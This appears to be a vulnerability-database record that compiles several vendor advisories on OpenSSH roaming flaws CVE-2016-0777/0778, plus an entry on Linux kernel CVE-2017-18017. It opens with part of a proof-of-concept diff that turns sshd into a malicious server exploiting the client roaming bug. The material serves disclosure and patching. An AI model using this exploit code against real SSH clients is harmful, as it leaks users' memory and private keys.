server_recv_buf_size = get_recv_buf_size();\n+\tconst u_int server_send_buf_size = get_snd_buf_size();\n+\tdebug(\"%s: client_recv_buf_size %u\", __func__, client_recv_buf_size);\n+\tdebug(\"%s: server_recv_buf_size %u\", __func__, server_recv_buf_size);\n+\tdebug(\"%s: server_send_buf_size %u\", __func__, server_send_buf_size);\n+\n+\tu_int client_send_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_send_buf_size:\")) != NULL)\n+\t\tclient_send_buf_size = strtoul(cp + 21, NULL, 0);\n+\telse if (client_recv_buf_size == DEFAULT_ROAMBUF)\n+\t\tclient_send_buf_size = DEFAULT_ROAMBUF;\n+\telse {\n+\t\tconst u_int\n+\t\t max = MAX(client_recv_buf_size, server_recv_buf_size),\n+\t\t min = MIN(client_recv_buf_size, server_recv_buf_size);\n+\t\tif (min \u003c= 0)\n+\t\t\tfatal(\"%s: min %u\", __func__, min);\n+\t\tif (((u_int64_t)(max - min) * 1024) / min \u003c 1)\n+\t\t\tclient_send_buf_size = server_send_buf_size;\n+\t\telse\n+\t\t\tclient_send_buf_size = client_recv_buf_size;\n+\t}\n+\tdebug(\"%s: client_send_buf_size %u\", __func__, client_send_buf_size);\n+\tif (client_send_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_send_buf_size\", __func__);\n+\n+\tu_int id = 0;\n+\tchar *dir = NULL;\n+\tfor (;;) {\n+\t\tid = arc4random();\n+\t\tdebug(\"%s: id %u\", __func__, id);\n+\t\tfree(dir);\n+\t\tdir = get_roaming_dir(id);\n+\t\tif (mkdir(dir, S_IRWXU) == 0)\n+\t\t\tbreak;\n+\t\tif (errno != EEXIST)\n+\t\t\tfatal(\"%s: mkdir %s errno %d\", __func__, dir, errno);\n+\t}\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tif (chdir(dir) != 0)\n+\t\tfatal(\"%s: chdir %s errno %d\", __func__, dir, errno);\n+\n+\tu_int client_out_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_out_buf_size:\")) != NULL)\n+\t\tclient_out_buf_size = strtoul(cp + 20, NULL, 0);\n+\telse if (overflow != 0)\n+\t\tclient_out_buf_size = MAX_ROAMBUF;\n+\telse\n+\t\tclient_out_buf_size = 1 + arc4random() % 4096;\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_out_buf_size\", __func__);\n+\tdump_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size,\n+\t\t\t\t\t sizeof(client_out_buf_size));\n+\n+\tif ((cp = strstr(roaming, \"scp_mode\")) != NULL) {\n+\t\tif (overflow != 0)\n+\t\t\tfatal(\"%s: scp_mode is incompatible with overflow %d\",\n+\t\t\t __func__, overflow);\n+\n+\t\tu_int seconds_left_to_sleep = 3;\n+\t\tif ((cp = strstr(cp, \"sleep:\")) != NULL)\n+\t\t\tseconds_left_to_sleep = strtoul(cp + 6, NULL, 0);\n+\t\tdebug(\"%s: sleep %u\", __func__, seconds_left_to_sleep);\n+\n+\t\tif (client_session_channel == -1)\n+\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t __func__, client_session_channel);\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_int(server_session_channel);\n+\t\tpacket_put_int(0); /* server window */\n+\t\tpacket_put_int(0); /* server maxpacket */\n+\t\tpacket_send();\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_DATA);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_string(\"\\0\\n\", 2); /* response\u0026source|sink\u0026run_err */\n+\t\tpacket_send();\n+\n+\t\tpacket_read_expect(SSH2_MSG_CHANNEL_REQUEST);\n+\t\tpacket_get_int(); /* server channel */\n+\t\tdebug(\"%s: channel request %s\", __func__,\n+\t\t packet_get_cstring(NULL));\n+\n+\t\twhile (seconds_left_to_sleep)\n+\t\t\tseconds_left_to_sleep = sleep(seconds_left_to_sleep);\n+\t}\n+\n+\tpacket_start(SSH2_MSG_REQUEST_SUCCESS);\n+\tpacket_put_int(id); /* roaming_id */\n+\tpacket_put_int64(arc4random()); /* cookie */\n+\tpacket_put_int64(0); /* key1 */\n+\tpacket_put_int64(0); /* key2 */\n+\tpacket_put_int(client_out_buf_size - client_send_buf_size);\n+\tpacket_send();\n+\tpacket_write_wait();\n+\n+\tif (overflow != 0) {\n+\t\tconst u_int64_t full_client_out_buf = get_recv_bytes() +\n+\t\t\t\t client_out_buf_size;\n+\n+\t\tu_int fd_leaks = 4 * 8 * 8; /* MIN_CHUNK_SIZE in bits */\n+\t\tif ((cp = strstr(roaming, \"fd_leaks:\")) != NULL)\n+\t\t\tfd_leaks = strtoul(cp + 9, NULL, 0);\n+\t\tdebug(\"%s: fd_leaks %u\", __func__, fd_leaks);\n+\n+\t\twhile (fd_leaks--) {\n+\t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN);\n+\t\t\tpacket_put_cstring(overflow == \u0027X\u0027 ? \"x11\" :\n+\t\t\t \"auth-agent@openssh.com\"); /* ctype */\n+\t\t\tpacket_put_int(arc4random()); /* server channel */\n+\t\t\tpacket_put_int(arc4random()); /* server window */\n+\t\t\tpacket_put_int(arc4random()); /* server maxpacket */\n+\t\t\tif (overflow == \u0027X\u0027) {\n+\t\t\t\tpacket_put_cstring(\"\"); /* originator */\n+\t\t\t\tpacket_put_int(arc4random()); /* port */\n+\t\t\t}\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\t\tpacket_get_int(); /* server channel */\n+\t\t\tpacket_get_int(); /* client channel */\n+\t\t\tpacket_get_int(); /* client window */\n+\t\t\tpacket_get_int(); /* client maxpacket */\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\twhile (get_recv_bytes() \u003c= full_client_out_buf) {\n+\t\t\tpacket_start(SSH2_MSG_GLOBAL_REQUEST);\n+\t\t\tpacket_put_cstring(\"\"); /* rtype */\n+\t\t\tpacket_put_char(1); /* want_reply */\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_REQUEST_FAILURE);\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\tif (kex == NULL)\n+\t\t\tfatal(\"%s: no kex, cannot rekey\", __func__);\n+\t\tif (kex-\u003eflags \u0026 KEX_INIT_SENT)\n+\t\t\tfatal(\"%s: KEX_INIT_SENT already\", __func__);\n+\t\tchar *const ptr = buffer_ptr(\u0026kex-\u003emy);\n+\t\tconst u_int len = buffer_len(\u0026kex-\u003emy);\n+\t\tif (len \u003c= 1+4) /* first_kex_follows + reserved */\n+\t\t\tfatal(\"%s: kex len %u\", __func__, len);\n+\t\tptr[len - (1+4)] = 1; /* first_kex_follows */\n+\t\tkex_send_kexinit(kex);\n+\n+\t\tu_int i;\n+\t\tpacket_read_expect(SSH2_MSG_KEXINIT);\n+\t\tfor (i = 0; i \u003c KEX_COOKIE_LEN; i++)\n+\t\t\tpacket_get_char();\n+\t\tfor (i = 0; i \u003c PROPOSAL_MAX; i++)\n+\t\t\tfree(packet_get_string(NULL));\n+\t\tpacket_get_char(); /* first_kex_follows */\n+\t\tpacket_get_int(); /* reserved */\n+\t\tpacket_check_eom();\n+\n+\t\tchar buf[8192*2]; /* two packet_read_seqnr bufferfuls */\n+\t\tmemset(buf, \u0027\\0\u0027, sizeof(buf));\n+\t\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL);\n+\t\tpacket_put_string(buf, sizeof(buf));\n+\t\tpacket_send();\n+\t\tconst Buffer *const output = packet_get_output();\n+\t\tdump_roaming_file(\"output\", buffer_ptr(output),\n+\t\t\t\t\t buffer_len(output));\n+\t}\n+\n+\tconst u_int64_t client_write_bytes = get_recv_bytes();\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\tdump_roaming_file(\"client_write_bytes\", \u0026client_write_bytes,\n+\t\t\t\t\t sizeof(client_write_bytes));\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n server_input_global_request(int type, u_int32_t seq, void *ctxt)\n {\n \tchar *rtype;\n@@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_\n \t} else if (strcmp(rtype, \"no-more-sessions@openssh.com\") == 0) {\n \t\tno_more_sessions = 1;\n \t\tsuccess = 1;\n+\t} else if (strcmp(rtype, ROAMING_REQUEST) == 0) {\n+\t\tif (want_reply != 1)\n+\t\t\tfatal(\"%s: rtype %s want_reply %d\", __func__,\n+\t\t\t\t rtype, want_reply);\n+\t\troaming_disconnect(ctxt);\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, ROAMING_REQUEST);\n \t}\n \tif (want_reply) {\n \t\tpacket_start(success ?\ndiff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c\n--- openssh-6.4p1/sshd.c\t2013-07-19 20:21:53.000000000 -0700\n+++ openssh-6.4p1+roaming/sshd.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -2432,6 +2432,8 @@ do_ssh2_kex(void)\n \t}\n \tif (options.kex_algorithms != NULL)\n \t\tmyproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms;\n+\telse\n+\t\tmyproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX \",\" KEX_RESUME;\n \n \tif (options.rekey_limit || options.rekey_interval)\n \t\tpacket_set_rekey_limits((u_int32_t)options.rekey_limit,\n. \n\nMore details about identifying an attack and mitigations will be\navailable in the Qualys Security Advisory. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:6.0p1-4+deb7u3. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:6.7p1-5+deb8u1. \n\nFor the testing distribution (stretch) and unstable distribution (sid), these\nproblems will be fixed in a later version. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05247375\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05247375\nVersion: 1\n\nHPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System\n(vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information,\nRemote Denial of Service (DoS), Remote Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-08-29\nLast Updated: 2016-08-29\n\nPotential Security Impact: Remote Denial of Service (DoS), Disclosure of\nInformation, Unauthorized Modification Of Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in the lighttpd and OpenSSH\nversion used in HPE Remote Device Access: Virtual Customer Access System\n(vCAS). These vulnerabilities could be exploited remotely resulting in\nunauthorized modification of information, denial of service (DoS), and\ndisclosure of information. \n\nReferences:\n\nCVE-2015-3200\nCVE-2016-0777\nCVE-2016-0778\nPSRT110211\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHPE Remote Device Access: Virtual Customer Access System (vCAS) - v15.07 (RDA\n8.1) and earlier. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2015-3200\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n CVE-2016-0777\n 6.5 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)\n\n CVE-2016-0778\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following updates available to resolve the vulnerabilities\nin Remote Device Access: Virtual Customer Access System (vCAS)\n\nvCAS 16.05 (RDA 8.7) kits - hp-rdacas-16.05-10482-vbox.ova and\nhp-rdacas-16.05-10482.ova. \n\nThe Oracle VirtualBox kit is available at:\nhttps://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova\n\nThe VMware ESX(i) and VMware Player kit is available at:\nhttps://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova\n\nHISTORY\nVersion:1 (rev.1) - 29 August 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/openssh \u003c 7.1_p2 \u003e= 7.1_p2\n\nDescription\n===========\n\nQualys have reported two issues in the \"roaming\" code included in the\nOpenSSH client, which provides undocumented, experimental support for\nresuming SSH connections. Users with private keys that are not protected by a\npassphrase are advised to generate new keys if they have connected to\nan SSH server they don\u0027t fully trust. \n\nWorkaround\n==========\n\nThe issues can be worked around by disabling the roaming code. To do\nso, add \"UseRoaming no\" to the SSH client configuration, or specify \"-o\n\u0027UseRoaming no\u0027\" on the command line. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-7.1_p2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-0777\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777\n[ 2 ] CVE-2016-0778\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201601-01\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssh security update\nAdvisory ID: RHSA-2016:0043-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html\nIssue date: 2016-01-14\nCVE Names: CVE-2016-0777 CVE-2016-0778 \n=====================================================================\n\n1. Summary:\n\nUpdated openssh packages that fix two security issues are now available for\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSH is OpenBSD\u0027s SSH (Secure Shell) protocol implementation. \nThese packages include the core files necessary for both the OpenSSH client\nand server. (CVE-2016-0778)\n\nRed Hat would like to thank Qualys for reporting these issues. \n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nppc64:\nopenssh-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-clients-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-6.6.1p1-23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0777\nhttps://access.redhat.com/security/cve/CVE-2016-0778\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/articles/2123781\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo\nnXgYWs8cZcyoTRVoriTGHQo=\n=1sk9\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
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VAR-201801-1708
Vulnerability from variot - Updated: 2026-04-10 22:06The tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c in the Linux kernel before 4.11, and 4.9.x before 4.9.36, allows remote attackers to cause a denial of service (use-after-free and memory corruption) or possibly have unspecified other impact by leveraging the presence of xt_TCPMSS in an iptables action. Linux Kernel Contains a vulnerability in the use of freed memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Linux Kernel is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition. Linux kernel versions prior to 4.11, and 4.9.x prior to 4.9.36 are vulnerable. 7.3) - ppc64, ppc64le, x86_64
Security Fix(es):
- An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)
Note: This issue is present in hardware and cannot be fully fixed via software update. The updated kernel packages provide software side of the mitigation for this hardware issue. To be fully functional, up-to-date CPU microcode applied on the system might be required.
Red Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting CVE-2018-3639.
Bug Fix(es):
These updated kernel packages include also numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. See the bug fix descriptions in the related Knowledge Article: https://access.redhat.com/articles/3461451
- Bugs fixed (https://bugzilla.redhat.com/):
1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c 1566890 - CVE-2018-3639 hw: cpu: speculative store bypass
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. (BZ#1549731)
-
Intel Core X-Series (Skylake) processors use a hardcoded Time Stamp Counter (TSC) frequency of 25 MHz. In some cases this can be imprecise and lead to timing-related problems such as time drift, timers being triggered early, or TSC clock instability. This update mitigates these problems by no longer using the "native_calibrate_tsc()" function to define the TSC frequency. Refined calibration is now used to update the clock rate accordingly in these cases. (BZ#1547854)
Red Hat would like to thank Mohamed Ghannam for reporting CVE-2017-8824; Jan H. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2018:1062-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:1062 Issue date: 2018-04-10 CVE Names: CVE-2016-3672 CVE-2016-7913 CVE-2016-8633 CVE-2017-7294 CVE-2017-8824 CVE-2017-9725 CVE-2017-12154 CVE-2017-12190 CVE-2017-13166 CVE-2017-14140 CVE-2017-15116 CVE-2017-15121 CVE-2017-15126 CVE-2017-15127 CVE-2017-15129 CVE-2017-15265 CVE-2017-17448 CVE-2017-17449 CVE-2017-17558 CVE-2017-18017 CVE-2017-18203 CVE-2017-1000252 CVE-2017-1000407 CVE-2017-1000410 CVE-2018-5750 CVE-2018-6927 CVE-2018-1000004 =====================================================================
- Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
Security Fix(es):
-
hw: cpu: speculative execution permission faults handling (CVE-2017-5754, Important, KVM for Power)
-
kernel: Buffer overflow in firewire driver via crafted incoming packets (CVE-2016-8633, Important)
-
